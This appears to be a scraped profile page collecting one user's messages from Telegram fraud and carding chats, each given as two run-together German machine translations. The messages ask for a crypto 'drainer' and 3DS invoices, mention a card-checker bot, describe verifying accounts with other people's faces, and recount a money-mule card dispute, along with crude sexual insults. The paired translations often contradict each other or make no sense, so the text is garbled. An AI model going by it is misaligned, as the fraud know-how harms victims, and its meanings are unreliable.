Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Schlag dir mit deinem Schwanz gegen die Stirn.Ich spritze mir mit meinem Schwanz auf die Stirn
B
Bonya2026-03-06 15:18
So wie eine Fünf auf dem 2,5😂-Bildschirm.Wie die Fünf auf dem Screenshot 2,5😂
B
Bonya2026-02-19 17:05
an euch alle.An euch alle
B
Bonya2026-02-19 17:04
Wenn du einen Deal abschließt, werde ich lachen.Wenn du eine Transaktion eröffnest, werde ich lachen.
B
Bonya2026-02-19 17:04
kontinental?kontinental?
B
Bonya2026-02-19 17:04
Da ist sie also.Na, da ist sie ja einverstanden
B
Bonya2026-02-19 17:01
Prüfen Sie daher immer die Bonität, wenn Sie nach einem Bürgen fragen.So sollten Sie immer vorgehen, wenn Sie nach dem Garantiegeber fragen.
B
Bonya2026-02-19 17:00
Er fragte nach einem Bürgen und verschwand sofort.Er hat kurz nach dem Bürgen gefragt und war dann sofort verschwunden.
B
Bonya2026-02-19 17:00
Ay, CarinaHey Karina
B
Bonya2026-02-19 16:59
Du suchst also einen Bürgen?Na, gehst du zum Garanten?
B
Bonya2026-02-19 16:57
Ohne einen Bürgen würde ich auch keinen Prozentsatz der Ausgaben bereitstellen.Ich würde auch nicht nach einem Prozentsatz der Ausgaben zahlen, ohne dass es eine Garantie gibt.
B
Bonya2026-02-19 16:57
Ich?Ich?
B
Bonya2026-02-19 16:57
Na ja, sie hat Screenshots gepostet, und du hast mir gar nichts gegeben.Na ja, sie hat Screenshots gepostet, und du hast gar nichts beigesteuert.
B
Bonya2026-02-19 16:56
Schau dir die Screenshots an, die sie gepostet hatSchau dir mal die Screenshots an, die sie gepostet hat.
B
Bonya2026-02-19 16:55
Er hat nichts über einen Bürgen geschrieben?Hat er nichts über den Garanten geschrieben?
B
Bonya2026-02-19 16:54
Du bist ein Spinner😂Bist du etwa ein Spinner? 😂
B
Bonya2026-02-19 16:53
Sie haben nach einem Bürgen gefragt.Du hast den Bürgen darum gebeten
B
Bonya2026-02-19 16:52
wobeian welcher Stelle
B
Bonya2026-02-17 14:37
Wer besorgt einem Laden ein paar gute Autos?Wer hat einen Shop mit guten Autos?
B
Bonya2026-02-17 12:10
Egal, wo du willst – die machen das für dich😂Egal wo, wenn es Spaß macht, machen sie es dir gerne😂
-- EMPIRE CHAT (24 Nachrichten) --
B
Bonya2026-03-14 13:17
Ich habe schon herausgefunden, wie es geht, aber ich bin zu faul, um es zu erklären.Ich habe es schon verstanden, aber ich bin zu faul, es zu erklären.
B
Bonya2026-03-14 13:17
Der wird dich auf jeden Fall fertigmachen.Er wird dich auf jeden Fall über den Tisch ziehen.
B
Bonya2026-03-12 17:16
Auf verschiedene Weise.Auf verschiedene Weise
B
Bonya2026-03-12 17:08
+ Außerdem toben gerade jede Menge Stürme.+ Im Moment gibt es heftige Stürme
B
Bonya2026-03-12 17:07
Wenn es schwarz ist, wette ich, dassWenn es schwarz wäre, hätte ich gewettet
B
Bonya2026-03-12 17:07
Das hängt davon ab, um welche Art von Angebot es sich handelt – wenn es weiß ist, dann ja.Das hängt vom jeweiligen Angebot ab – wenn es ein weißes ist, dann ja.
B
Bonya2026-03-12 17:06
Das sind zwei völlig verschiedene WeltenZwei verschiedene Welten, das sind
B
Bonya2026-03-12 17:06
Es gibt kein anderesEs gibt überhaupt keine andere
B
Bonya2026-03-12 17:06
Sie können es so einrichten, dass nur PCsDort kann man einstellen, dass nur PCs angezeigt werden.
B
Bonya2026-03-12 17:05
Google ist nicht so effektiv, wie ich denke.Google ist meiner Meinung nach nicht so effektiv
B
Bonya2026-03-12 17:05
Na ja, ich nutze Google nicht, sondern nur Facebook.Na ja, ich arbeite nicht mit Google, sondern nur mit Facebook.
B
Bonya2026-03-12 17:05
Solange man während des ganzen Vorgangs eine Ligatur finden muss.Vorausgesetzt, dass man all diese Dummköpfe noch irgendwie unter einen Hut bringen muss
B
Bonya2026-03-12 17:04
Ausschussware, Akeys, die wie Stürme nur so davonfliegen. Und so weiter.Rejects, Accounts verschwinden einfach so wie Stürme. Und so weiter
B
Bonya2026-03-12 17:04
Es ist nicht alles eitel Sonnenschein, Alter.Das ist noch lange nicht alles, Kumpel, das sind nur die Spitzen
B
Bonya2026-03-12 17:03
Alle regulären Air-Käufe mit höherem VertrauenAlle gängigen Akkus mit bester Leistung
B
Bonya2026-03-12 17:03
Derzeit gibt es keine guten Agenturen auf dem Markt.Derzeit gibt es keine guten Agenturen auf dem Markt.
B
Bonya2026-03-12 17:02
Eher nervenaufreibend als beängstigendEher nervenaufreibend als beängstigend
B
Bonya2026-03-12 17:02
Krypto, Glücksspiel-Instinkt und Schwarzsein – all das kommt zum VorscheinKrypto, Glücksspiel und Schwarzmarkt – alles läuft auf Hochtouren
B
Bonya2026-03-12 17:01
Das Letzte, was die Stadt getan hat, war, sich in 2d einzuhacken.Das Letzte, was in die Stadt kam, war 2D-Grafik
B
Bonya2026-03-12 17:01
Klettern: Wenn du nach mir suchst – sei es aus eigenem Antrieb oder aus Kostengründen –, um herauszufinden, welche 2D-Routen 1–2.000 Zeles für Tests erfordern, die nicht lange halten werden.Es funktioniert, wenn man es sucht – egal, ob aus eigener Tasche oder aus dem Budget. Um herauszufinden, was in 2D funktioniert, muss man 1–2k Zela für Tests ausgeben, und selbst dann hält es nicht lange durch.
B
Bonya2026-03-12 17:00
Ich schütte gerade ein.Ich gieße
B
Bonya2026-03-12 16:59
(da es für weiße Angebote keine derartigen Anforderungen gibt)Weil es für weiße Angebote keine solchen Anforderungen gibt)
B
Bonya2026-02-14 14:33
Wer hat einen „Dreiner“ unter AML-Prüfung? Nur mit Dep oder „Ready“ beim BürgenHat jemand einen Drainer für den AML-Test? Nur mit Depot oder fertig auf Garant?
B
Bonya2026-01-11 03:14
Da ist jemand im FB-Beat, und da ist ein Kumpel. Brauche FB-Nachschub, der Preis ist verhandelbar.Es gibt jemanden, der auf Facebook gepostet hat, und es gibt Schimpfwörter. Ich muss mein Facebook-Guthaben aufladen – über den Preis können wir uns einigen.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 Beiträge) --
B
Bonya2025-12-05 12:04
Rechnungen benötigt, Payzaty, Cashfree, Eportal 3DSRechnungen benötigt, Payzaty, Cashfree, Eportal 3DS
B
Bonya2025-11-22 11:14
Gibt es einen Chat-Garant?Gibt es hier einen Chat-Moderator?
-- Chat „Traffic-Arbitrage“ (2 Nachrichten) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
Der Tg-Kanal wird gekapertDer [REDACTED]-Kanal wird gekapert
-- Raven CC-Prüfprogramm (2 Nachrichten) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Vision Browser Chat (2 Nachrichten) --
B
Bonya2025-11-14 16:47
Danke.Danke
B
Bonya2025-11-14 16:47
vicen werk in ru?„Vision Work“ auf Russisch?
-- 💬ONE|Chat (86 Nachrichten) --
B
Bonya2025-03-05 17:06
Leute, sagt mir doch mal, wo ich Bremsbeläge kaufen kann.Leute, gebt mir mal einen Tipp, wo man Spielplätze finden kann.
B
Bonya2025-03-05 16:22
Ich kann einfach nicht mal einen Manic gebenEr kann nicht einmal eine Maniküre machen
B
Bonya2025-03-05 16:22
ebensoebenso
B
Bonya2025-03-05 16:21
Sag mir verdammt noch mal, ob der Mentor einen Chatraum mit den Schülern hat oder nicht.Verdammt, kann mir mal jemand sagen, ob der Mentor einen Chat mit den Schülern hat oder nicht?
B
Bonya2025-03-05 16:10
und wem gehört das?Und wer ist „ts“?
B
Bonya2025-03-05 15:44
Es ist nicht schwer, aber es gibt hier keine vollständigen Anleitungen, sondern nur Tutorials.Es ist dort nicht schwer, aber es gibt hier keine vollständigen Anleitungen – nur die von den Mentoren.
B
Bonya2025-03-05 15:42
Im Grunde genommen ja, wenn man weiß, wie es geht.Im Grunde genommen ja, wenn man es kann
B
Bonya2025-03-05 15:42
einen halben Tageinen halben Tag lang
B
Bonya2025-03-05 15:42
Der erste hat 600 Teilnehmer, er antwortet nicht.Bei den ersten 600 Personen gibt er keine Antwort
B
Bonya2025-03-05 15:41
Wenn du das Geld hast, kauf dir das Modell, das 200 Dollar kostet.Wenn du Geld hast, nimm die, die 200 $ verlangt.
B
Bonya2025-03-05 13:55
Wer kann super gut unterrichten – gibt es dort einen Chatraum für Schüler?Gibt es bei „Fantastika“ einen Chat für die Schüler?
B
Bonya2025-03-03 15:10
SchecksQuittungen
B
Bonya2025-03-03 15:10
Das Gerät, das staubsaugtDie staubsaugt
B
Bonya2025-03-03 15:10
VerstandenEs gibt
B
Bonya2025-03-03 15:10
Es gibt wahrscheinlich auch Huren mit Software.Da gibt’s auf jeden Fall Probleme mit der Software
B
Bonya2025-03-03 15:09
Es warEs war
B
Bonya2025-03-03 15:09
Oh, das ist gut.Oh, das ist ja super
B
Bonya2025-03-03 15:09
Trinuriuet ruruTrinuriuet Ruru
B
Bonya2025-03-03 15:09
Und sie werden gesammeltUnd die werden gesammelt
B
Bonya2025-03-03 15:09
Tip sitzt einfach nur da und zerknüllt Verpackungen.Der Typ sitzt da und zerrt an seinen Chipstüten herum.
B
Bonya2025-03-03 15:04
Warum gibt es ukrainische Kfz-Kennzeichen?P – wozu die ukrainischen Nummern?
B
Bonya2025-03-03 15:03
Ich sagte: „kc.“Ich habe „kz“ gesagt
B
Bonya2025-03-03 15:03
Ich hab’s verstanden.Ich habe es verstanden.
B
Bonya2025-03-03 15:03
Wenn es kompliziert ist, verlierst du deinen Bowlerhut.Wenn es hier bei dir kompliziert wird, geht dir der Kessel kaputt
B
Bonya2025-03-03 15:03
Scheiße, lass uns mal vergleichen, wie oft du den FB-Rekul laufen lässt, während ich die Mehlschwitze vom Herd nehme.Scheiß drauf, gib mal her, wie oft du den FB-Recul startest, während ich die Kamera abnehme
B
Bonya2025-03-03 15:02
Für eine BegleitpersonZum Escort
B
Bonya2025-03-03 15:02
Die Typen haben so eine Chitty-Chitty-Einstellung, dass man da glatt einen verdammten Wichser starten könnte.Diese Typen haben sich so entwickelt, dass sie sich einen runterholen, bis zum Umfallen
B
Bonya2025-03-03 15:02
Scheiße, hier sind lauter Woker.Verdammt, hier sind nur Workers auf der Straße
B
Bonya2025-03-03 15:02
Welche Art von TischenWelche Tische
B
Bonya2025-03-03 15:01
30 gehören dir, wenn du eine schöne Stimme hast.30 werden dir gehören, wenn deine Stimme schön ist
B
Bonya2025-03-03 15:01
Es gibt mehr GeldDort gibt es mehr Geld
B
Bonya2025-03-03 15:01
Komm doch zu mir ins Büro und arbeite dort.Komm doch ins Kulturzentrum und arbeite bei mir
B
Bonya2025-03-03 15:00
NeinNein
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ Ich weiß nicht, wie man eine Wiederholung abspielt+ Ich habe keine Ahnung von den Begriffen
B
Bonya2025-03-03 14:59
Gute Drops sind schwer zu finden.Gute Drops sind schwer zu finden.
B
Bonya2025-03-03 14:58
Oder gibt es eine Version 1.0?Oder 1.0 ist vorhanden
B
Bonya2025-03-03 14:58
Hier gibt es nur 2,0 Phish.Und hier sind die Fische mit einer Stromstärke von 2,0
B
Bonya2025-03-03 14:58
Oder lieber 1.0 als 2.0.Na ja, besser 1.0 als 2.0
B
Bonya2025-03-03 14:57
Mit MammutsMit den Mammuts
B
Bonya2025-03-03 14:57
2.0 funktioniert nicht, wenn man nur herumsitzt und rumalbert.2.0 – Es bringt nichts, rumzusitzen und zu quatschen
B
Bonya2025-03-03 14:57
Ich bin eher der Typ für den Straßenverkehr.Was den Datenverkehr angeht, bin ich nicht mehr der Größte
B
Bonya2025-03-03 14:57
Hier sind die „X’s“ von RooHier sind die X auf der Hand
B
Bonya2025-03-03 14:56
Aber das sind keine WerbeslogansAber das sind keine Werbeteams
B
Bonya2025-03-03 14:56
Das tun sie. Ich kenne jemanden, der das tut.(Das machen) Bekannte von mir
B
Bonya2025-03-03 14:56
Das ist allerdings anders, wenn man weiß, wie man täglich 400–500 verdient.Na ja, wenn man es draufhat, kann man locker 400–500 pro Tag verdienen.
B
Bonya2025-03-03 14:55
Na und, was ist schon dabei?)Na ja, was habe ich hier denn vergessen? )
B
Bonya2025-03-03 14:55
Es gibt einen Link zum HandbuchDort ist ein Link zum Handbuch
B
Bonya2025-03-03 14:54
Das sind genau solche HändeSo etwas wird für Aufregung sorgen
B
Bonya2025-03-03 14:54
Verdammt noch mal sabbern und gaffen, nur um eine verdammte Hand zu bekommen.Um einen Orgasmus zu bekommen, kann man sabbern und die Augen weit in die Seiten rollen.
B
Bonya2025-03-03 14:54
Na, wo liegt denn das Problem? Es ist doch dasselbe Vork.Na ja, wo liegt denn hier das Problem? Das ist doch dasselbe.
B
Bonya2025-03-03 14:53
Es wird einen Monat dauern, bis wir die Zone erreichen.In einem Monat werden sie in die Zone gebracht
B
Bonya2025-03-03 14:53
Und es gibt keinen Ausweg. Wer was im Kopf hat, kommt schon darauf. Wer nicht, der fliegt hier raus.Ja, und hier gibt’s nichts zu tun – wenn man den Verstand hat, kommt man schon klar; wenn nicht, was soll man hier schon machen?
B
Bonya2025-03-03 14:53
Was willst du?Was wolltest du denn?
B
Bonya2025-03-03 14:53
AnzeigeWerbung
B
Bonya2025-03-03 14:52
Ich bin jetzt seit zwei Tagen hier, und 2.0 finde ich nicht interessant. Ich fand es eigentlich cool.Ich bin jetzt seit zwei Tagen hier und 2.0 interessiert mich nicht – ich dachte, das wäre irgendwie cool.
B
Bonya2025-03-03 14:52
Und genießt ein MammutUnd einen Mammut zu halten
B
Bonya2025-03-03 14:52
Überlege dir gut, was du sagen willst.Ich muss erst mal darüber nachdenken, was ich antworten soll.
B
Bonya2025-03-03 14:52
Es gibt keine GeheimnisseHier gibt es keine Geheimnisse
B
Bonya2025-03-03 14:52
Was wird er dir geben?Was wird er Ihnen geben?
B
Bonya2025-03-03 14:52
Na ja, was bringt das schon, wenn im Handbuch genau dieselben Informationen stehen?Also, was bringt es, wenn all diese Infos im Handbuch stehen?
B
Bonya2025-03-03 14:51
Er wird Zeit haben, auf all eure Schwänze zu antwortenIch werde es wohl nicht schaffen, euch allen zu antworten
B
Bonya2025-03-03 14:51
Was für ein Training!Welche Praxis?
B
Bonya2025-03-03 14:51
Da drinnen sind 100 Leute.Mensch, da sind bei ihm jeweils 100 Leute
B
Bonya2025-03-03 14:51
Warum gibst du mir nicht etwas Geld, dann gebe ich dir die Bedienungsanleitung für die Klemme.Vielleicht schickt ihr mir ein bisschen Kohle, dann gebe ich euch die Anleitung aus dem Archiv.
B
Bonya2025-03-03 14:50
Bei der FestlegungIn der Befestigung
B
Bonya2025-03-03 14:50
Du brauchst kein Handbuch, um dir das alles beizubringen.Ach, was soll's, ihr braucht doch alle eine Anleitung, die gibt's doch
B
Bonya2025-03-03 14:50
2.0 ist eben so, wie es ist.2.0 Was war, das ist auch heute noch
B
Bonya2025-03-03 14:50
Was zum Teufel ist das Problem?Was für eine verdammte Aufgabe das doch ist
B
Bonya2025-03-03 14:48
Hast du es selbst angefangen?Hast du schon selbst angefangen?
B
Bonya2025-03-03 14:48
Kein „Kuckuck“Das funktioniert überhaupt nicht
B
Bonya2025-03-03 14:48
Es gibt einen Treffer für „lk“In der LK gibt es einen Mord
B
Bonya2025-03-03 14:48
Was ist denn mit dem lk los?Welche Arbeit im Bereich der Lichttechnik?
B
Bonya2025-03-03 14:48
Welcher von denen seid ihr denn, ihr Arschlöcher, wie ihr es selbst gesagt habt?Woher hast du diese Scheißer, wie du so schön gesagt hast?
B
Bonya2025-03-03 14:47
Ich verstehe nicht, was du hier meinst.Da habe ich nicht ganz verstanden, was du gesagt hast.
B
Bonya2025-03-03 14:46
Wenn sie angemeldet sind, umso besser.Wenn sie in die LC kommen, dann ZBS
B
Bonya2025-03-03 14:46
Na, melden sie sich denn an?Na, schaut ihr mal bei mir vorbei?
B
Bonya2025-03-03 14:45
Ich weiß nicht, wie sie die aufnehmen.Keine Ahnung, ich habe keine Ahnung, wie man die filmt
B
Bonya2025-03-03 14:45
Hündchen, die man abschreiben muss?Auf die Liste setzen?
B
Bonya2025-03-03 14:45
Scheiße, da ist ein verdammter DruckknopfScheiß drauf, da muss man sich noch mit dem Zeug rumschlagen
B
Bonya2025-03-03 14:42
Ich schütte es mir selbst einIch gieße selbst
B
Bonya2025-03-03 14:42
Mir ist verdammt noch mal klar geworden, dass das nichts für Weicheier ist.Ich hab's verdammt noch mal kapiert, das ist doch totaler Schwachsinn
B
Bonya2025-03-03 14:41
Alter, hier wird nichts mit Jetons verkauft, das ist ein „Payday-Jeton“.Alter, hier wird nichts auf Fisch verkauft, hier gibt’s Fisch nur gegen Bezahlung.
B
Bonya2025-03-03 14:41
Ich verstehe schon, man kann es nirgendwo hinschüttenMir ist klar geworden, dass man es hier nirgendwo hin schütten kann.
B
Bonya2025-03-03 14:40
Regular 2.0, glaube ich.So etwas wie die üblichen 2.0
B
Bonya2025-03-03 14:40
Es ist ja nicht so, als würden sie den Datenverkehr überflutenDa wird also nicht sofort Traffic generiert
-- FbStor – Chat für erfolgreiche Webmaster! (23 Beiträge) --
B
Bonya2025-02-26 07:51
Na ja, mach doch, was auch immer du willst, du Arsch.Na ja, mach da einfach, was du willst, ist doch egal, wie es aussieht
B
Bonya2025-02-26 07:50
Ein Schüler 200₽ dai.Na ja, der Schulmütze 200₽ geben
B
Bonya2025-02-26 07:50
Das wird schon klappenDas geht schon
B
Bonya2025-02-26 07:50
Du wirst einen Obdachlosen auf der Straße sehen.Geh auf die Straße und such einen Obdachlosen
B
Bonya2025-02-26 07:50
Also glaubt jeder an sein eigenes Gesicht, egal wessen es ist.Also lassen sich dort alle auf ihr eigenes Gesicht verifizieren – wem ist das schon wichtig?
B
Bonya2025-02-26 07:50
Auf dein Gesicht.Auf eigene Rechnung
B
Bonya2025-02-26 07:49
Aber Tatsache ist: Egal, ich habe es schon zehnmal gemacht.Aber eigentlich ist es mir egal, ich habe so etwa 10 verifizierte Accounts.
B
Bonya2025-02-26 07:49
Also sag mal, du redest doch nur Unsinn.Also sag mal, verteilst du da nur Schwarzmalerei?
B
Bonya2025-02-26 07:49
Du kannstDas geht
B
Bonya2025-02-26 07:49
Auf dein Gesicht.Auf eigene Rechnung
B
Bonya2025-02-16 20:26
anstatt sie mit irgendeinem Training zu ruinieren und sie im Straßenverkehr laufen zu lassen.und nicht etwa, sie mit irgendeinem Kurs zu verarschen und damit Traffic zu generieren
B
Bonya2025-02-16 20:25
das Übliche, UBT, TT, TT, YouTube usw.die üblichen Sachen wie UBT, TT, YouTube und so weiter
B
Bonya2025-02-15 17:31
XzKeine Ahnung
B
Bonya2025-02-15 17:31
Unter dem Vorwand einer SchulungUnter dem Vorwand der Ausbildung
B
Bonya2025-02-15 17:31
Zu den KanälenZu den Kanälen
B
Bonya2025-02-15 17:31
Das liegt einfach am Menschenandrang.Es ist einfach der Traffic, der die Leute anzieht
B
Bonya2025-02-15 17:31
Der Typ sagt also, man solle alle seine Kanäle abonnierenDer Typ sagt also, man solle alle seine Kanäle abonnieren.
B
Bonya2025-02-15 16:36
Du musst nicht schreibenHui Nyu schlägt vor, dass ihr das nicht schreiben müsst
B
Bonya2025-02-06 15:11
Wenn du die Grundlagen des Einschenkens nicht beherrschst, wirst duWenn du solche Grundlagen nicht kennst, wie sollst du dann gießen?
B
Bonya2025-02-06 15:11
Es gibt eine Schaltfläche, mit der man das Aipi ändern kann – du solltest zumindest mal danach googeln.Wenn du auf den Button klickst, ändert sich die IP-Adresse – googel es doch mal.
B
Bonya2025-02-06 15:10
🤨🤨
B
Bonya2025-02-06 15:09
Sie können das aipi dort durch Drehen verändern.Dort kann man die Rotation der IP-Adresse ändern
B
Bonya2025-02-06 15:09
Warum 1? Es ist doch dasselbe Handy.Warum 1? Das sind doch Handys.
-- CryptoGrab – Chat zur gegenseitigen Hilfe (10 Nachrichten) --
B
Bonya2025-02-06 15:31
So einfach ist das nichtSo einfach ist das nicht
B
Bonya2025-02-06 15:31
Ganz einfach.Izi
B
Bonya2025-01-23 20:30
Kein einziges BeispielNicht nur ein Beispiel
B
Bonya2025-01-23 20:30
Es ist nicht gerade lustig, dass ich im Internet keine Anzeigen für AML-Tests finden konnte.Ist das nicht komisch, dass ich im Internet überhaupt keine Werbung für AML-Tests gefunden habe?
B
Bonya2025-01-23 17:20
Auf der AML steht überhaupt nichts.Auf AML gibt es überhaupt nichts
B
Bonya2025-01-23 17:20
Ich habe aml auf Facebook ausprobiert, um auch in den USA Fuß zu fassen – selbst alte Bundles, die im Internet nicht zu finden sind, sind sinnvoll.Ich habe versucht, auf Facebook nach „AML“ zu suchen, um mehr über Amerika zu erfahren, habe aber im Internet keine vernünftigen, auch nicht älteren Links dazu gefunden.
B
Bonya2025-01-23 17:19
Na, was für ein Angebot hast du denn vor?Na ja, und überhaupt – was für ein Angebot hast du denn vor?
B
Bonya2025-01-23 17:16
Nutzt du AML?Und, gießt du AML?
B
Bonya2025-01-21 20:38
Jeder, der FB einschenkt, möchte gerne ein paar Fragen klärenGibt es hier jemanden, der auf Facebook postet? Ich hätte gerne ein paar Fragen dazu.
B
Bonya2025-01-20 11:08
Hat jemand Beispiele für CREOS für AML?Hat jemand Beispiele für KREO für AML?
-- Rolex | Allgemeiner Chat (28 Nachrichten) --
B
Bonya2024-09-11 15:29
Was machen die Litauer auf welchem Platz?Und auf welcher Plattform wird Litauen gerade fertiggemacht?
B
Bonya2024-09-11 15:21
Du legst dich mit der Schraube an?Willst du mich verarschen?
B
Bonya2024-09-11 15:20
Es ist nur so, dass die Seiten sehr restriktiv sind und man so viel damit herumfummeln mussDie Plattformen schränken die Arbeit einfach sehr ein, und es gibt so viel Scheiß damit.
B
Bonya2024-09-11 15:19
Ich habe da schon eine Idee. Wenn sie das umsetzen, wird es verdammt geil.Ich hab mir da ein Thema ausgedacht und es geschrieben – wenn sie es umsetzen, wird es der Hammer
B
Bonya2024-09-11 15:19
Auf der Finca sehe ich nicht besonders viele Baumstämme.Ich sehe da nicht wirklich irgendwelche Logos auf der Vorderseite.
B
Bonya2024-09-11 15:19
Bei den Veranstaltungsorten läuft da irgendwas total Abgefahrenes ab.Ach komm, die Typen haben da irgendeinen Scheiß mit allen Spielfeldern am Laufen.
B
Bonya2024-09-11 15:16
Genau das meine ich, das ist so was wie eine Furt auf einer Furt.Na ja, ich sag ja immer: Betrug auf Betrug
B
Bonya2024-09-11 15:15
Ich verstehe nicht, was jetzt besser laufen soll – ich sehe ja, dass in Finnland niemand arbeitet.Ich kann überhaupt nicht verstehen, was gerade besser läuft – ich sehe, dass bei allen irgendetwas mit der Finke nicht funktioniert.
B
Bonya2024-09-11 15:08
Na ja, die Chancen stehen 50:50, ob man mit den Proxys Glück hat.Na ja, 50:50 – wenn man Glück mit den Proxys hat
B
Bonya2024-09-11 15:07
Aber nur damit du es verstehst: Heutzutage, mit diesen Luxus-Proxys, dreht es sogar bei Viber durch, sobald man sich einloggt.Aber damit du’s verstehst: Mit diesen Luxus-Proxys fliegt man sogar in Viber auf, wenn man sich einloggt.
B
Bonya2024-09-11 15:07
Na ja, bei den EU-Dosen bin ich mir nicht sicher.Na ja, von den EU-Banken habe ich keine Ahnung.
B
Bonya2024-09-11 15:07
In lkIn lk
B
Bonya2024-09-11 15:06
Früher hatten die Feinkostläden zehn begehbare Kühlräume.Früher hielten die Lacke 10 Durchgänge lang
B
Bonya2024-09-11 15:06
Na ja, die 922 liegt ebenfalls bei 1 und hält sich gut.Na ja, 922 kommt auch rein, die halten durch
B
Bonya2024-09-11 15:05
Selbst privat macht ihnen das schon nach drei Besuchen Angst.Selbst Privat-Nachrichten nach dem dritten Versuch täuschen sie
B
Bonya2024-09-11 15:05
Wenn 1 Bevollmächtigter 1–2 BankenWenn 1 Proxy 1–2 Stromversorgungen hat
B
Bonya2024-09-11 15:05
Nun, das hängt davon ab, bei welcher BankDas hängt davon ab, um welche Bank es sich handelt
B
Bonya2024-09-11 15:04
Die Stellvertreter sind in diesem Laksheri-Quatsch oft verdammt schmutzigIn Lakshari sind die Proxy-Seiten oft voll mit Müll
B
Bonya2024-09-11 08:44
Schläft es?Schläft er denn?
B
Bonya2024-09-11 08:40
Oh, das ist eine tolle Idee.Das mit dem ZBS habe ich mir ausgedacht
B
Bonya2024-09-11 08:40
Gibt es dort nicht so etwas wie einen Flohmarkt oder so?Und warum gibt es bei denen nicht so was wie Flohmärkte hier und da?
B
Bonya2024-09-11 08:40
Völlig danebenХуево
B
Bonya2024-09-11 08:39
BilyaBilya
B
Bonya2024-09-11 08:39
Gibt es Chatrooms?Gibt es dort Chats?
B
Bonya2024-09-11 08:38
Weiß jemand,Weiß das vielleicht jemand?
B
Bonya2024-09-11 08:38
Nutzen die Leute in Finca TG?Nutzen die Leute in Finnland [REDACTED]?
B
Bonya2024-09-10 12:14
Danke.Danke
B
Bonya2024-09-10 12:13
Wie spät ist es in Finnland?Wie spät ist es gerade in Finnland?
-- Aktuelles/Verifizierungen/Verdienstmöglichkeiten💃🛍 (37 Beiträge) --
B
Bonya2024-06-16 17:17
Ich sehe keine leidenschaftlichen Verteidiger von ihrIch sehe hier keine leidenschaftlichen Verfechter von ihr
B
Bonya2024-06-16 17:17
Nun, die Situation wurde ja insgesamt geschildert, und dann trifft jeder seine eigene Entscheidung – und die Tatsache, dass nur Admin Pasha sie verteidigt, spricht Bände.Na ja, ich habe die Situation geschildert, und nun trifft jeder seine eigene Entscheidung. Dass sie nur von Admin Pascha verteidigt wird, spricht Bände.
B
Bonya2024-06-16 17:15
Und sie hat wieder nicht gezahltUnd sie hat wieder nicht bezahlt.
B
Bonya2024-06-16 17:15
Nein, sie hat es an uns überwiesen, und da wir dann nicht über das nötige Guthaben verfügten, um das Geld weiterzuleiten, haben wir uns als letzten Ausweg an Vika gewandt.Nein, sie hat es auf uns abgewälzt, aber wir hatten hier keine Hauptüberweisungsmöglichkeit, um das Geld zu überweisen, und so haben wir als allerletzten Ausweg an Vika geschrieben.
B
Bonya2024-06-16 17:14
Anfangs ging es uns auch gut, aber in letzter Zeit verschwindet dein Geld ständig.Anfangs lief bei uns auch alles normal, aber in letzter Zeit verschwindet bei euch ständig Geld.
B
Bonya2024-06-16 17:14
Mache ich hier Spam? Ich sitze hier und sage den Leuten die Wahrheit. Du kannst das gerne ignorieren. Lass die Leute wissen, wie du arbeitest.Und habe ich Spam? Ich sitze hier und erzähle den Leuten die Wahrheit – du kannst das gerne löschen, was ändert das schon? Die Leute sollen wissen, wie ihr arbeitet.
B
Bonya2024-06-16 17:13
Wenn man so etwas hatWenn Ihnen so etwas passiert
B
Bonya2024-06-16 17:13
Es ist also an der Zeit, dass du darüber nachdenkstEs ist also an der Zeit, dass Sie darüber nachdenken
B
Bonya2024-06-16 17:13
Auch mit nei arbeiten wir schon seit langer Zeit zusammen, und dies ist nun schon das zweite Mal, dass so etwas passiert ist.Wir arbeiten auch schon lange mit ihr zusammen, und das ist bereits der zweite Fall.
B
Bonya2024-06-16 17:13
Und sie hat die GS aufgezeichnet und gesagt: „Du weißt ja, wie das läuft.“Und sie hat sich das notiert und gesagt, dass Sie wissen, wie das funktioniert.
B
Bonya2024-06-16 17:13
Genau so läuft das: Fangen wir von vorne an. Wir haben ihre Karte genommen, um Geld abzuheben, haben 60.000 eingezahlt, sie wollte das Geld abheben und schreibt nun, dass das Geld nicht da sein wird, weil der Geldautomat die Karte verschluckt hat – und das war’s. Wir haben einfach 60.000 weggeworfen.Genau das ist die Sache: Also, fangen wir von vorne an. Wir haben ihre Bankkarte genommen, 60k darauf eingezahlt, sie ist losgegangen, um das Geld abzuheben, und schreibt dann, dass es kein Geld geben wird, angeblich habe der Geldautomat ihre Karte eingezogen, und das war’s. Wir haben die 60k einfach verloren.
B
Bonya2024-06-16 17:11
Sie ist nicht diejenige, die uns in der Hand hatUnd nicht wir bei ihr
B
Bonya2024-06-16 17:11
Zwar wurden uns 60.000 gestohlen,Obwohl uns 60k gestohlen wurden
B
Bonya2024-06-16 17:11
Normal? Wir haben hier alles erklärt. Du behauptest, wir wären Idioten.Normal? Wir haben hier alles erklärt, und ihr sagt, wir seien Idioten.
B
Bonya2024-06-16 17:10
Du nimmst sie in SchutzSie verteidigen sie
B
Bonya2024-06-16 17:10
Sie hat unser Geld immer noch.Unser Geld ist bei ihr geblieben
B
Bonya2024-06-16 17:10
AlleAlles
B
Bonya2024-06-16 17:10
Dass einem Mann 60 Riesen gezahlt wurden, sagte sie, es gebe kein Geld.Als man dem Mann 60k überwiesen hatte, sagte er, es werde kein Geld geben.
B
Bonya2024-06-16 17:10
Beschrieben*Beschrieben*
B
Bonya2024-06-16 17:10
Die gesamte Situation wurde Ihnen bereits geschildertDir wurde die ganze Situation beschrieben
B
Bonya2024-06-16 17:09
Wer ist der Verräter? Sie oder wir.Wer ist hier der Dropoid – sie oder wir?
B
Bonya2024-06-16 17:09
Wir haben 60.000 auf dem Konto. Wo ist das Geld?60k eingezahlt – wo ist das Geld?
B
Bonya2024-06-16 17:09
Die Situation wurde dir bereits ausführlich erklärt, es spielt keine Rolle, welchem Geschlecht du angehörst.Welche Frauen haben dir die ganze Situation erklärt? Das Geschlecht spielt dabei überhaupt keine Rolle.
B
Bonya2024-06-16 17:08
Hol dir 60 Riesen und mach Feierabend.60k abkassieren und dann die Nase voll haben
B
Bonya2024-06-16 17:08
Oder ich ficke dich, soweit es vernünftig ist.Oder was zum Teufel ist bei euch im Rahmen des Zumutbaren?
B
Bonya2024-06-16 17:08
Die Leute haben kein Geld, um dafür zu bezahlenWovon sollen die Menschen das bezahlen?
B
Bonya2024-06-16 17:08
